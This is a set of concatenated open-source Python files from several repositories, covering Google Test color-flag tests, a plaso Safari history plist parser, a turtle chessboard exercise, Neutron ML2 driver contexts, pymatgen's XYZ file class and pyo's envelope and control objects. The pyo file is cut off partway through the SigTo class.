self.assert_(UsesColor('xterm', None, 'auto'))
self.assert_(UsesColor('dumb', None, 'yes'))
self.assert_(UsesColor('xterm', None, 'yes'))
def testEnvVarOnly(self):
"""Tests the case when there's GTEST_COLOR but not --gtest_color."""
self.assert_(not UsesColor('dumb', 'no', None))
self.assert_(not UsesColor('xterm-color', 'no', None))
if not IS_WINDOWS:
self.assert_(not UsesColor('dumb', 'auto', None))
self.assert_(UsesColor('xterm-color', 'auto', None))
self.assert_(UsesColor('dumb', 'yes', None))
self.assert_(UsesColor('xterm-color', 'yes', None))
def testEnvVarAndFlag(self):
"""Tests the case when there are both GTEST_COLOR and --gtest_color."""
self.assert_(not UsesColor('xterm-color', 'no', 'no'))
self.assert_(UsesColor('dumb', 'no', 'yes'))
self.assert_(UsesColor('xterm-color', 'no', 'auto'))
def testAliasesOfYesAndNo(self):
"""Tests using aliases in specifying --gtest_color."""
self.assert_(UsesColor('dumb', None, 'true'))
self.assert_(UsesColor('dumb', None, 'YES'))
self.assert_(UsesColor('dumb', None, 'T'))
self.assert_(UsesColor('dumb', None, '1'))
self.assert_(not UsesColor('xterm', None, 'f'))
self.assert_(not UsesColor('xterm', None, 'false'))
self.assert_(not UsesColor('xterm', None, '0'))
self.assert_(not UsesColor('xterm', None, 'unknown'))
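# A rough reconstruction, for illustration only, of the precedence these
# tests pin down (this helper is not part of Google Test): an explicit
# --gtest_color flag wins over the GTEST_COLOR environment variable, and
# 'auto' falls back to TERM-based detection.
def ShouldUseColorSketch(term, color_env_var, color_flag, is_windows=False):
  setting = color_flag if color_flag is not None else color_env_var
  if setting is not None:
    if setting.lower() in ('yes', 'true', 't', '1'):
      return True
    if setting.lower() != 'auto':
      return False
  # 'auto' or nothing specified: decide from the terminal type.
  return is_windows or term in ('linux', 'cygwin', 'xterm', 'xterm-color',
                                'xterm-256color')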
if __name__ == '__main__':
gtest_test_utils.Main()
| apache-2.0 |
joachimmetz/plaso | plaso/parsers/plist_plugins/safari.py | 2 | 3592 | # -*- coding: utf-8 -*-
"""Plist parser plugin for Safari history plist files."""
from dfdatetime import cocoa_time as dfdatetime_cocoa_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import plist
from plaso.parsers.plist_plugins import interface
class SafariHistoryEventData(events.EventData):
"""Safari history event data.
Attributes:
display_title (str): display title of the webpage visited.
title (str): title of the webpage visited.
url (str): URL visited.
visit_count (int): number of times the website was visited.
was_http_non_get (bool): True if the webpage was visited using a non-GET
HTTP request.
"""
DATA_TYPE = 'safari:history:visit'
def __init__(self):
"""Initializes event data."""
super(SafariHistoryEventData, self).__init__(data_type=self.DATA_TYPE)
self.display_title = None
self.title = None
self.url = None
self.visit_count = None
self.was_http_non_get = None
class SafariHistoryPlugin(interface.PlistPlugin):
"""Plist parser plugin for Safari history plist files."""
NAME = 'safari_history'
DATA_FORMAT = 'Safari history plist file'
PLIST_PATH_FILTERS = frozenset([
interface.PlistPathFilter('History.plist')])
PLIST_KEYS = frozenset(['WebHistoryDates', 'WebHistoryFileVersion'])
# pylint: disable=arguments-differ
def _ParsePlist(self, parser_mediator, match=None, **unused_kwargs):
"""Extracts Safari history items.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
match (Optional[dict[str: object]]): keys extracted from PLIST_KEYS.
"""
format_version = match.get('WebHistoryFileVersion', None)
if format_version != 1:
parser_mediator.ProduceExtractionWarning(
'unsupported Safari history version: {0!s}'.format(format_version))
return
if 'WebHistoryDates' not in match:
return
for history_entry in match.get('WebHistoryDates', {}):
last_visited_date = history_entry.get('lastVisitedDate', None)
if last_visited_date is None:
parser_mediator.ProduceExtractionWarning('missing last visited date')
continue
try:
# Last visited date is a string containing a floating point value.
timestamp = float(last_visited_date)
except (TypeError, ValueError):
parser_mediator.ProduceExtractionWarning(
'unable to convert last visited date {0:s}'.format(
last_visited_date))
continue
      event_data = SafariHistoryEventData()
      event_data.title = history_entry.get('title', None)
      display_title = history_entry.get('displayTitle', None)
      if display_title != event_data.title:
        event_data.display_title = display_title
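      # In Safari's History.plist the URL of an entry is stored under the
      # empty-string key, hence the '' lookup below.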
event_data.url = history_entry.get('', None)
event_data.visit_count = history_entry.get('visitCount', None)
event_data.was_http_non_get = history_entry.get(
'lastVisitWasHTTPNonGet', None)
# Convert the floating point value to an integer.
# TODO: add support for the fractional part of the floating point value.
timestamp = int(timestamp)
date_time = dfdatetime_cocoa_time.CocoaTime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_LAST_VISITED)
parser_mediator.ProduceEventWithEventData(event, event_data)
plist.PlistParser.RegisterPlugin(SafariHistoryPlugin)
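# Background note (not part of plaso): Safari stores lastVisitedDate as
# seconds since the Cocoa epoch, 2001-01-01 00:00:00 UTC, which is the
# convention dfdatetime's CocoaTime wraps. A plain-Python equivalent of the
# conversion, with an illustrative timestamp value:
#
#   import datetime
#   visit_time = (datetime.datetime(2001, 1, 1) +
#                 datetime.timedelta(seconds=370144963.0))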
| apache-2.0 |
Valka7a/python-playground | python-course-softuni/introduction-python3/lecture-one-excercises/ex7.py | 1 | 1947 | import turtle
# Get user's input
board_size = input('Enter board size: ')
# Validate user's input
try:
board_size = int(board_size)
if board_size < 8:
        raise Exception('Board size cannot be less than 8.')
except ValueError:
print('Invalid input!')
exit()
except Exception as error:
print(error)
exit()
# Configure turtle's color based on current row and col
def configure_turtle_color(row, col):
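    # Squares alternate colors along a row; offsetting col by one on odd
    # rows flips the pattern so neighbouring rows are staggered like a
    # chessboard.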
if row % 2 == 1:
col += 1
if col % 2 == 0:
turtle.color('black')
return
turtle.color('white')
# Draw single square with the size provided
def draw_square(size, fill=True):
if fill:
turtle.begin_fill()
for _ in range(4):
turtle.forward(size)
turtle.left(90)
if fill:
turtle.end_fill()
# Draw borders around the board,
# so it can be seen properly with
# any background color
def draw_board_borders():
turtle.penup()
turtle.color('black')
turtle.goto(-1, -1)
turtle.pendown()
draw_square(board_size + 2, False)
turtle.penup()
turtle.color('white')
turtle.goto(-2, -2)
turtle.pendown()
draw_square(board_size + 4, False)
# Draw the chess board
def draw_chess_board():
item_length = board_size / 8
row = x_coord = y_coord = 0
for number in range(1, 65):
configure_turtle_color(row, number)
turtle.penup()
turtle.goto(x_coord, y_coord)
turtle.pendown()
draw_square(item_length)
x_coord += item_length
if number % 8 == 0:
row += 1
x_coord = 0
y_coord += item_length
draw_board_borders()
# Configure the turtle
turtle.speed('fastest')
turtle.bgcolor('brown')
# Draw
draw_chess_board()
# Move the turtle to the side,
# so the chessboard is seen
# better when it's with smaller size
turtle.penup()
turtle.goto(-10, -10)
# Wait for user's click to exit
turtle.exitonclick() | mit |
subramani95/neutron | neutron/plugins/ml2/driver_context.py | 6 | 4610 | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.openstack.common import jsonutils
from neutron.plugins.ml2 import db
from neutron.plugins.ml2 import driver_api as api
class MechanismDriverContext(object):
"""MechanismDriver context base class."""
def __init__(self, plugin, plugin_context):
self._plugin = plugin
# This temporarily creates a reference loop, but the
# lifetime of PortContext is limited to a single
# method call of the plugin.
self._plugin_context = plugin_context
class NetworkContext(MechanismDriverContext, api.NetworkContext):
def __init__(self, plugin, plugin_context, network,
original_network=None):
super(NetworkContext, self).__init__(plugin, plugin_context)
self._network = network
self._original_network = original_network
self._segments = db.get_network_segments(plugin_context.session,
network['id'])
@property
def current(self):
return self._network
@property
def original(self):
return self._original_network
@property
def network_segments(self):
return self._segments
class SubnetContext(MechanismDriverContext, api.SubnetContext):
def __init__(self, plugin, plugin_context, subnet, original_subnet=None):
super(SubnetContext, self).__init__(plugin, plugin_context)
self._subnet = subnet
self._original_subnet = original_subnet
@property
def current(self):
return self._subnet
@property
def original(self):
return self._original_subnet
class PortContext(MechanismDriverContext, api.PortContext):
def __init__(self, plugin, plugin_context, port, network,
original_port=None):
super(PortContext, self).__init__(plugin, plugin_context)
self._port = port
self._original_port = original_port
self._network_context = NetworkContext(plugin, plugin_context,
network)
self._binding = db.ensure_port_binding(plugin_context.session,
port['id'])
if original_port:
self._original_bound_segment_id = self._binding.segment
self._original_bound_driver = self._binding.driver
else:
self._original_bound_segment_id = None
self._original_bound_driver = None
self._new_port_status = None
@property
def current(self):
return self._port
@property
def original(self):
return self._original_port
@property
def network(self):
return self._network_context
@property
def bound_segment(self):
        segment_id = self._binding.segment
        if segment_id:
            for segment in self._network_context.network_segments:
                if segment[api.ID] == segment_id:
return segment
@property
def original_bound_segment(self):
if self._original_bound_segment_id:
for segment in self._network_context.network_segments:
if segment[api.ID] == self._original_bound_segment_id:
return segment
@property
def bound_driver(self):
return self._binding.driver
@property
def original_bound_driver(self):
return self._original_bound_driver
def host_agents(self, agent_type):
return self._plugin.get_agents(self._plugin_context,
filters={'agent_type': [agent_type],
'host': [self._binding.host]})
def set_binding(self, segment_id, vif_type, vif_details,
status=None):
# TODO(rkukura) Verify binding allowed, segment in network
self._binding.segment = segment_id
self._binding.vif_type = vif_type
self._binding.vif_details = jsonutils.dumps(vif_details)
self._new_port_status = status
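# Illustrative only, not part of Neutron: a minimal mechanism driver showing
# how bind_port() would consume a PortContext like the one above. The
# vif_type and vif_details values here are assumptions for the sketch.
class _SketchMechanismDriver(object):
    def bind_port(self, context):
        # Bind on the first segment of the port's network.
        for segment in context.network.network_segments:
            context.set_binding(segment[api.ID], 'ovs',
                                {'port_filter': True})
            return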
| apache-2.0 |
montoyjh/pymatgen | pymatgen/io/xyz.py | 5 | 4144 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Module implementing an XYZ file object class.
"""
import re
from pymatgen.core.structure import Molecule
from monty.io import zopen
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "[email protected]"
__date__ = "Apr 17, 2012"
class XYZ:
"""
Basic class for importing and exporting Molecules or Structures in XYZ
format.
Args:
mol: Input molecule or list of molecules
.. note::
Exporting periodic structures in the XYZ format will lose information
about the periodicity. Essentially, only cartesian coordinates are
written in this format and no information is retained about the
lattice.
"""
def __init__(self, mol, coord_precision=6):
if isinstance(mol, Molecule) or not isinstance(mol, list):
self._mols = [mol]
else:
self._mols = mol
self.precision = coord_precision
@property
def molecule(self):
"""
Returns molecule associated with this XYZ. In case multiple frame
XYZ, returns the last frame.
"""
return self._mols[-1]
@property
def all_molecules(self):
"""
Returns all the frames of molecule associated with this XYZ.
"""
return self._mols
@staticmethod
def _from_frame_string(contents):
"""
Convert a single frame XYZ string to a molecule
"""
lines = contents.split("\n")
num_sites = int(lines[0])
coords = []
sp = []
coord_patt = re.compile(
r"(\w+)\s+([0-9\-\+\.eEdD]+)\s+([0-9\-\+\.eEdD]+)\s+([0-9\-\+\.eEdD]+)"
)
for i in range(2, 2 + num_sites):
m = coord_patt.search(lines[i])
if m:
sp.append(m.group(1)) # this is 1-indexed
# this is 0-indexed
# in case of 0.0D+00 or 0.00d+01 old double precision writing
# replace d or D by e for ten power exponent
xyz = [val.lower().replace("d", "e") for val in m.groups()[1:4]]
coords.append([float(val) for val in xyz])
return Molecule(sp, coords)
@staticmethod
def from_string(contents):
"""
Creates XYZ object from a string.
Args:
contents: String representing an XYZ file.
Returns:
XYZ object
"""
if contents[-1] != "\n":
contents += "\n"
white_space = r"[ \t\r\f\v]"
natoms_line = white_space + r"*\d+" + white_space + r"*\n"
comment_line = r"[^\n]*\n"
coord_lines = r"(\s*\w+\s+[0-9\-\+\.eEdD]+\s+[0-9\-\+\.eEdD]+\s+[0-9\-\+\.eEdD]+\s*\n)+"
frame_pattern_text = natoms_line + comment_line + coord_lines
pat = re.compile(frame_pattern_text, re.MULTILINE)
mols = []
for xyz_match in pat.finditer(contents):
xyz_text = xyz_match.group(0)
mols.append(XYZ._from_frame_string(xyz_text))
return XYZ(mols)
@staticmethod
def from_file(filename):
"""
Creates XYZ object from a file.
Args:
filename: XYZ filename
Returns:
XYZ object
"""
with zopen(filename) as f:
return XYZ.from_string(f.read())
def _frame_str(self, frame_mol):
output = [str(len(frame_mol)), frame_mol.composition.formula]
fmtstr = "{{}} {{:.{0}f}} {{:.{0}f}} {{:.{0}f}}".format(self.precision)
for site in frame_mol:
output.append(fmtstr.format(site.specie, site.x, site.y, site.z))
return "\n".join(output)
def __str__(self):
return "\n".join([self._frame_str(mol) for mol in self._mols])
def write_file(self, filename):
"""
Writes XYZ to file.
Args:
filename: File name of output file.
"""
with zopen(filename, "wt") as f:
f.write(self.__str__())
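# A short usage sketch relying only on the public API defined above:
if __name__ == "__main__":
    # Round-trip a hydrogen molecule through the XYZ format.
    mol = Molecule(["H", "H"], [[0.0, 0.0, 0.0], [0.0, 0.0, 0.74]])
    xyz = XYZ(mol)
    print(xyz)
    assert len(XYZ.from_string(str(xyz)).molecule) == 2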
| mit |
jpippy/pyo | pyolib/controls.py | 5 | 24741 | """
Objects designed to create parameter's control at audio rate.
These objects can be used to create envelopes, line segments
and conversion from python number to audio signal.
The audio streams of these objects can't be sent to the output
soundcard.
"""
"""
Copyright 2009-2015 Olivier Belanger
This file is part of pyo, a python module to help digital signal
processing script creation.
pyo is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
pyo is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with pyo. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
from _core import *
from _maps import *
from _widgets import createGraphWindow
from types import ListType, TupleType
######################################################################
### Controls
######################################################################
class Fader(PyoObject):
"""
Fadein - fadeout envelope generator.
Generate an amplitude envelope between 0 and 1 with control on fade
times and total duration of the envelope.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
fadein : float, optional
Rising time of the envelope in seconds. Defaults to 0.01.
fadeout : float, optional
Falling time of the envelope in seconds. Defaults to 0.1.
dur : float, optional
Total duration of the envelope. Defaults to 0, which means wait
for the stop() method to start the fadeout.
.. note::
The out() method is bypassed. Fader's signal can not be sent to audio outs.
The play() method starts the envelope.
The stop() calls the envelope's release phase if `dur` = 0.
>>> s = Server().boot()
>>> s.start()
>>> f = Fader(fadein=0.5, fadeout=0.5, dur=2, mul=.5)
>>> a = BrownNoise(mul=f).mix(2).out()
>>> def repeat():
... f.play()
>>> pat = Pattern(function=repeat, time=2).play()
"""
def __init__(self, fadein=0.01, fadeout=0.1, dur=0, mul=1, add=0):
pyoArgsAssert(self, "nnnOO", fadein, fadeout, dur, mul, add)
PyoObject.__init__(self, mul, add)
self._fadein = fadein
self._fadeout = fadeout
self._dur = dur
fadein, fadeout, dur, mul, add, lmax = convertArgsToLists(fadein, fadeout, dur, mul, add)
self._base_objs = [Fader_base(wrap(fadein,i), wrap(fadeout,i), wrap(dur,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setFadein(self, x):
"""
Replace the `fadein` attribute.
:Args:
x : float
new `fadein` attribute.
"""
pyoArgsAssert(self, "n", x)
self._fadein = x
x, lmax = convertArgsToLists(x)
[obj.setFadein(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setFadeout(self, x):
"""
Replace the `fadeout` attribute.
:Args:
x : float
new `fadeout` attribute.
"""
pyoArgsAssert(self, "n", x)
self._fadeout = x
x, lmax = convertArgsToLists(x)
[obj.setFadeout(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDur(self, x):
"""
Replace the `dur` attribute.
:Args:
x : float
new `dur` attribute.
"""
pyoArgsAssert(self, "n", x)
self._dur = x
x, lmax = convertArgsToLists(x)
[obj.setDur(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 10., 'lin', 'fadein', self._fadein, dataOnly=True),
SLMap(0, 10., 'lin', 'fadeout', self._fadeout, dataOnly=True),
SLMap(0, 20., 'lin', 'dur', self._dur, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def fadein(self):
"""float. Rising time of the envelope in seconds."""
return self._fadein
@fadein.setter
def fadein(self, x): self.setFadein(x)
@property
def fadeout(self):
"""float. Falling time of the envelope in seconds."""
return self._fadeout
@fadeout.setter
def fadeout(self, x): self.setFadeout(x)
@property
def dur(self):
"""float. Total duration of the envelope."""
return self._dur
@dur.setter
def dur(self, x): self.setDur(x)
class Adsr(PyoObject):
"""
Attack - Decay - Sustain - Release envelope generator.
Calculates the classical ADSR envelope using linear segments.
Duration can be set to 0 to give an infinite sustain. In this
case, the stop() method calls the envelope release part.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
attack : float, optional
Duration of the attack phase in seconds. Defaults to 0.01.
decay : float, optional
Duration of the decay in seconds. Defaults to 0.05.
sustain : float, optional
Amplitude of the sustain phase. Defaults to 0.707.
release : float, optional
Duration of the release in seconds. Defaults to 0.1.
dur : float, optional
Total duration of the envelope. Defaults to 0, which means wait
for the stop() method to start the release phase.
.. note::
The out() method is bypassed. Adsr's signal can not be sent to audio outs.
The play() method starts the envelope.
The stop() calls the envelope's release phase if `dur` = 0.
>>> s = Server().boot()
>>> s.start()
>>> f = Adsr(attack=.01, decay=.2, sustain=.5, release=.1, dur=2, mul=.5)
>>> a = BrownNoise(mul=f).mix(2).out()
>>> def repeat():
... f.play()
>>> pat = Pattern(function=repeat, time=2).play()
"""
def __init__(self, attack=0.01, decay=0.05, sustain=0.707, release=0.1, dur=0, mul=1, add=0):
pyoArgsAssert(self, "nnnnnOO", attack, decay, sustain, release, dur, mul, add)
PyoObject.__init__(self, mul, add)
self._attack = attack
self._decay = decay
self._sustain = sustain
self._release = release
self._dur = dur
attack, decay, sustain, release, dur, mul, add, lmax = convertArgsToLists(attack, decay, sustain, release, dur, mul, add)
self._base_objs = [Adsr_base(wrap(attack,i), wrap(decay,i), wrap(sustain,i), wrap(release,i), wrap(dur,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setAttack(self, x):
"""
Replace the `attack` attribute.
:Args:
x : float
new `attack` attribute.
"""
pyoArgsAssert(self, "n", x)
self._attack = x
x, lmax = convertArgsToLists(x)
[obj.setAttack(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDecay(self, x):
"""
Replace the `decay` attribute.
:Args:
x : float
new `decay` attribute.
"""
pyoArgsAssert(self, "n", x)
self._decay = x
x, lmax = convertArgsToLists(x)
[obj.setDecay(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setSustain(self, x):
"""
Replace the `sustain` attribute.
:Args:
x : float
new `sustain` attribute.
"""
pyoArgsAssert(self, "n", x)
self._sustain = x
x, lmax = convertArgsToLists(x)
[obj.setSustain(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setRelease(self, x):
"""
        Replace the `release` attribute.
        :Args:
            x : float
                new `release` attribute.
"""
pyoArgsAssert(self, "n", x)
self._release = x
x, lmax = convertArgsToLists(x)
[obj.setRelease(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDur(self, x):
"""
Replace the `dur` attribute.
:Args:
x : float
new `dur` attribute.
"""
pyoArgsAssert(self, "n", x)
self._dur = x
x, lmax = convertArgsToLists(x)
[obj.setDur(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 5, 'lin', 'attack', self._attack, dataOnly=True),
SLMap(0, 5, 'lin', 'decay', self._decay, dataOnly=True),
SLMap(0, 1, 'lin', 'sustain', self._sustain, dataOnly=True),
SLMap(0, 10, 'lin', 'release', self._release, dataOnly=True),
SLMap(0, 20., 'lin', 'dur', self._dur, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def attack(self):
"""float. Duration of the attack phase in seconds."""
return self._attack
@attack.setter
def attack(self, x): self.setAttack(x)
@property
def decay(self):
"""float. Duration of the decay phase in seconds."""
return self._decay
@decay.setter
def decay(self, x): self.setDecay(x)
@property
def sustain(self):
"""float. Amplitude of the sustain phase."""
return self._sustain
@sustain.setter
def sustain(self, x): self.setSustain(x)
@property
def release(self):
"""float. Duration of the release phase in seconds."""
return self._release
@release.setter
def release(self, x): self.setRelease(x)
@property
def dur(self):
"""float. Total duration of the envelope."""
return self._dur
@dur.setter
def dur(self, x): self.setDur(x)
class Linseg(PyoObject):
"""
Trace a series of line segments between specified break-points.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
list : list of tuples
Points used to construct the line segments. Each tuple is a
new point in the form (time, value).
Times are given in seconds and must be in increasing order.
loop : boolean, optional
Looping mode. Defaults to False.
initToFirstVal : boolean, optional
If True, audio buffer will be filled at initialization with the
first value of the line. Defaults to False.
.. note::
The out() method is bypassed. Linseg's signal can not be sent to audio outs.
>>> s = Server().boot()
>>> s.start()
>>> l = Linseg([(0,500),(.03,1000),(.1,700),(1,500),(2,500)], loop=True)
>>> a = Sine(freq=l, mul=.3).mix(2).out()
>>> # then call:
>>> l.play()
"""
def __init__(self, list, loop=False, initToFirstVal=False, mul=1, add=0):
pyoArgsAssert(self, "lbbOO", list, loop, initToFirstVal, mul, add)
PyoObject.__init__(self, mul, add)
self._list = list
self._loop = loop
initToFirstVal, loop, mul, add, lmax = convertArgsToLists(initToFirstVal, loop, mul, add)
if type(list[0]) != ListType:
self._base_objs = [Linseg_base(list, wrap(loop,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
else:
listlen = len(list)
lmax = max(listlen, lmax)
self._base_objs = [Linseg_base(wrap(list,i), wrap(loop,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setList(self, x):
"""
Replace the `list` attribute.
:Args:
x : list of tuples
new `list` attribute.
"""
pyoArgsAssert(self, "l", x)
self._list = x
if type(x[0]) != ListType:
[obj.setList(x) for i, obj in enumerate(self._base_objs)]
else:
[obj.setList(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def replace(self, x):
"""
Alias for `setList` method.
:Args:
x : list of tuples
new `list` attribute.
"""
self.setList(x)
def getPoints(self):
return self._list
def setLoop(self, x):
"""
Replace the `loop` attribute.
:Args:
x : boolean
new `loop` attribute.
"""
pyoArgsAssert(self, "b", x)
self._loop = x
x, lmax = convertArgsToLists(x)
[obj.setLoop(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def graph(self, xlen=None, yrange=None, title=None, wxnoserver=False):
"""
Opens a grapher window to control the shape of the envelope.
When editing the grapher with the mouse, the new set of points
        will be sent to the object on mouse up.
Ctrl+C with focus on the grapher will copy the list of points to the
clipboard, giving an easy way to insert the new shape in a script.
:Args:
xlen : float, optional
Set the maximum value of the X axis of the graph. If None, the
                maximum value is retrieved from the current list of points.
yrange : tuple, optional
Set the min and max values of the Y axis of the graph. If
                None, min and max are retrieved from the current list of points.
title : string, optional
Title of the window. If none is provided, the name of the
class is used.
wxnoserver : boolean, optional
With wxPython graphical toolkit, if True, tells the
interpreter that there will be no server window.
If `wxnoserver` is set to True, the interpreter will not wait for the
server GUI before showing the controller window.
"""
        if xlen is None:
xlen = float(self._list[-1][0])
else:
xlen = float(xlen)
        if yrange is None:
ymin = float(min([x[1] for x in self._list]))
ymax = float(max([x[1] for x in self._list]))
if ymin == ymax:
yrange = (0, ymax)
else:
yrange = (ymin, ymax)
createGraphWindow(self, 0, xlen, yrange, title, wxnoserver)
@property
def list(self):
"""float. List of points (time, value)."""
return self._list
@list.setter
def list(self, x): self.setList(x)
@property
def loop(self):
"""boolean. Looping mode."""
return self._loop
@loop.setter
def loop(self, x): self.setLoop(x)
class Expseg(PyoObject):
"""
Trace a series of exponential segments between specified break-points.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
list : list of tuples
Points used to construct the line segments. Each tuple is a
new point in the form (time, value).
Times are given in seconds and must be in increasing order.
loop : boolean, optional
Looping mode. Defaults to False.
exp : float, optional
Exponent factor. Used to control the slope of the curves.
Defaults to 10.
inverse : boolean, optional
If True, downward slope will be inversed. Useful to create
biexponential curves. Defaults to True.
initToFirstVal : boolean, optional
If True, audio buffer will be filled at initialization with the
first value of the line. Defaults to False.
.. note::
The out() method is bypassed. Expseg's signal can not be sent to audio outs.
>>> s = Server().boot()
>>> s.start()
>>> l = Expseg([(0,500),(.03,1000),(.1,700),(1,500),(2,500)], loop=True)
>>> a = Sine(freq=l, mul=.3).mix(2).out()
>>> # then call:
>>> l.play()
"""
def __init__(self, list, loop=False, exp=10, inverse=True, initToFirstVal=False, mul=1, add=0):
pyoArgsAssert(self, "lbnbbOO", list, loop, exp, inverse, initToFirstVal, mul, add)
PyoObject.__init__(self, mul, add)
self._list = list
self._loop = loop
self._exp = exp
self._inverse = inverse
loop, exp, inverse, initToFirstVal, mul, add, lmax = convertArgsToLists(loop, exp, inverse, initToFirstVal, mul, add)
if type(list[0]) != ListType:
self._base_objs = [Expseg_base(list, wrap(loop,i), wrap(exp,i), wrap(inverse,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
else:
listlen = len(list)
lmax = max(listlen, lmax)
self._base_objs = [Expseg_base(wrap(list,i), wrap(loop,i), wrap(exp,i), wrap(inverse,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setList(self, x):
"""
Replace the `list` attribute.
:Args:
x : list of tuples
new `list` attribute.
"""
pyoArgsAssert(self, "l", x)
self._list = x
if type(x[0]) != ListType:
[obj.setList(x) for i, obj in enumerate(self._base_objs)]
else:
[obj.setList(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setLoop(self, x):
"""
Replace the `loop` attribute.
:Args:
x : boolean
new `loop` attribute.
"""
pyoArgsAssert(self, "b", x)
self._loop = x
x, lmax = convertArgsToLists(x)
[obj.setLoop(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setExp(self, x):
"""
Replace the `exp` attribute.
:Args:
x : float
new `exp` attribute.
"""
pyoArgsAssert(self, "n", x)
self._exp = x
x, lmax = convertArgsToLists(x)
[obj.setExp(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setInverse(self, x):
"""
Replace the `inverse` attribute.
:Args:
x : boolean
new `inverse` attribute.
"""
pyoArgsAssert(self, "b", x)
self._inverse = x
x, lmax = convertArgsToLists(x)
[obj.setInverse(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def replace(self, x):
"""
Alias for `setList` method.
:Args:
x : list of tuples
new `list` attribute.
"""
self.setList(x)
def getPoints(self):
return self._list
def graph(self, xlen=None, yrange=None, title=None, wxnoserver=False):
"""
Opens a grapher window to control the shape of the envelope.
When editing the grapher with the mouse, the new set of points
        will be sent to the object on mouse up.
Ctrl+C with focus on the grapher will copy the list of points to the
clipboard, giving an easy way to insert the new shape in a script.
:Args:
xlen : float, optional
Set the maximum value of the X axis of the graph. If None, the
                maximum value is retrieved from the current list of points.
Defaults to None.
yrange : tuple, optional
Set the min and max values of the Y axis of the graph. If
                None, min and max are retrieved from the current list of points.
Defaults to None.
title : string, optional
Title of the window. If none is provided, the name of the
class is used.
wxnoserver : boolean, optional
With wxPython graphical toolkit, if True, tells the
interpreter that there will be no server window.
If `wxnoserver` is set to True, the interpreter will not wait for the
server GUI before showing the controller window.
"""
        if xlen is None:
xlen = float(self._list[-1][0])
else:
xlen = float(xlen)
        if yrange is None:
ymin = float(min([x[1] for x in self._list]))
ymax = float(max([x[1] for x in self._list]))
if ymin == ymax:
yrange = (0, ymax)
else:
yrange = (ymin, ymax)
createGraphWindow(self, 2, xlen, yrange, title, wxnoserver)
@property
def list(self):
"""float. List of points (time, value)."""
return self._list
@list.setter
def list(self, x): self.setList(x)
@property
def loop(self):
"""boolean. Looping mode."""
return self._loop
@loop.setter
def loop(self, x): self.setLoop(x)
@property
def exp(self):
"""float. Exponent factor."""
return self._exp
@exp.setter
def exp(self, x): self.setExp(x)
@property
def inverse(self):
"""boolean. Inverse downward slope."""
return self._inverse
@inverse.setter
def inverse(self, x): self.setInverse(x)
class SigTo(PyoObject):
"""
Convert numeric value to PyoObject signal with portamento.
When `value` is changed, a ramp is applied from the current
value to the new value. Can be used with PyoObject to apply
a linear portamento on an audio signal.
:Parent: :py:class:`PyoObject`
:Args:
value : float or PyoObject
Numerical value to convert.
time : float, optional
Ramp time, in seconds, to reach the new value. Defaults to 0.025.
init : float, optional
Initial value of the internal memory. Defaults to 0.
.. note::
The out() method is bypassed. SigTo's signal can not be sent to audio outs.
>>> import random
>>> s = Server().boot()
>>> s.start()
>>> fr = SigTo(value=200, time=0.5, init=200)
>>> a = SineLoop(freq=fr, feedback=0.08, mul=.3).out()
